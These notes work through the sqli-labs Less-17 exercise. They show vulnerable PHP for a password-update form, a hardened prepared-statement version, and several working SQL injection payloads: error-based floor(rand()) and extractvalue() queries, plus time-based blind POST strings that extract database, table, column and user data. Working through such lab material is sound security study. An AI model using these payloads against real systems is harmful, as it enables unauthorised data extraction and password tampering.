These notes record my process of learning SQL injection; the material used is SQLi
Less-17: POST - Update Query - Error Based - String
Testing the vulnerability
In this level we can see that the page implements a change-password flow.
Enter admin as the username and pass' as the password.
The following error message is displayed:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1
We can see admin'', which shows that the password is wrapped in single quotes ' when it is processed.
Source code
$uname = check_input($_POST['uname']);
$passwd = $_POST['passwd'];   # the password is NOT passed through check_input()
# check_input() applies various kinds of escaping to username, so username cannot be used for injection here.
@$sql = "SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
$row1 = $row['username'];   # assumed: $row1 holds the username returned by the SELECT above
$update = "UPDATE users SET password = '$passwd' WHERE username='$row1'";
So the password is wrapped in single quotes ' during processing, and it is never escaped.
Next we inject through it using blind injection.
The statement that raises the error is the update statement:
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
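As an added defensive counterpart (this is not code from sqli-labs or the original post), the same password-update flow written with mysqli prepared statements, a password hash, and no database error text echoed to the user. It assumes a MySQL database named security with a users table holding username and password columns, placeholder connection credentials, and the mysqlnd driver (needed for get_result()).

```php
<?php
// Added example: hardened version of the Less-17 change-password flow.
// Report mysqli errors as exceptions so they can be logged, not displayed.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function reset_password(mysqli $conn, string $uname, string $passwd): bool
{
    // 1. Look the user up with a parameterised query. $uname is bound as a
    //    string value and never concatenated into the SQL text, so the
    //    check_input() escaping is no longer the only thing between the
    //    input and the SQL parser.
    $stmt = $conn->prepare("SELECT username FROM users WHERE username = ? LIMIT 1");
    $stmt->bind_param("s", $uname);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if ($row === null) {
        return false;            // unknown user: no UPDATE is issued at all
    }
    $name = $row['username'];

    // 2. Never store the raw password; hash it server-side.
    $hash = password_hash($passwd, PASSWORD_DEFAULT);

    // 3. The UPDATE binds both values as well. A password such as
    //    pass' is stored as a literal string, so the quote in it cannot
    //    change the statement and the error-based channel in the original
    //    $update string is gone.
    $stmt = $conn->prepare("UPDATE users SET password = ? WHERE username = ?");
    $stmt->bind_param("ss", $hash, $name);
    $stmt->execute();
    $changed = ($stmt->affected_rows === 1);
    $stmt->close();
    return $changed;
}

// Usage with constructed placeholder credentials (replace with real ones).
try {
    $conn = new mysqli("localhost", "dbuser", "dbpass", "security");
    $ok = reset_password($conn, $_POST['uname'] ?? '', $_POST['passwd'] ?? '');
    echo $ok ? "Password updated" : "Password not updated";
} catch (mysqli_sql_exception $e) {
    // Log the real error server-side; the client only sees a generic message.
    error_log("password reset failed: " . $e->getMessage());
    echo "An error occurred";
}
```

The "You have an error in your SQL syntax ... near 'admin''" text shown earlier is exactly what the catch block keeps out of the response; with the values bound as parameters there is no syntax error to raise in the first place.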
Sqli-labs lab notes: Less-17 error-based update explained https://www.xmanblog.net/2016/07/05/sqli-labs-less-17/
Example statement: modify the row in the users table whose name is inputuser
UPDATE users SET password = inputpass WHERE username = inputuser
Executed on the command line
Getting the database name
UPDATE users SET password = 'admin' WHERE password = (select 1 from (select count(*),(concat("~",database(),"~",floor(rand()*2)))name from information_schema.tables group by name)b);
Getting table names
UPDATE users SET password = 'admin' WHERE password = (select 1 from (select count(*),(concat("~",(select table_name from information_schema.tables where table_schema=database() limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b);
Getting column names
UPDATE users SET password = 'admin' WHERE password = (select 1 from (select count(*),(concat("~",(select column_name from information_schema.columns where table_name='users' limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b) ;
Getting data
UPDATE users SET password = 'admin' WHERE password = (select 1 from (select count(*),(concat("~",(select username from users limit 0,1),"~",floor(rand()*2)))name from information_schema.tables group by name)b);
Error-based injection
uname=admin&passwd=11'and extractvalue(1,concat(0x7e,(select @@version),0x7e))#&submit=Submit
This shows: FUNCTION security.extractvalue does not exist
The extractvalue() function is not supported on older MySQL versions.
Replace @@version with your own subquery to perform the other injections.
Time-based injection to guess the database name
POST data:
uname=admin&passwd=11'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&submit=Submit
or
uname=admin&passwd=11'and If(left(database(),1)='s',1,sleep(5))#&submit=Submit
(the first character of the database name is s)
When the guess is correct the login goes straight through; when it is wrong the response is delayed by 5 seconds.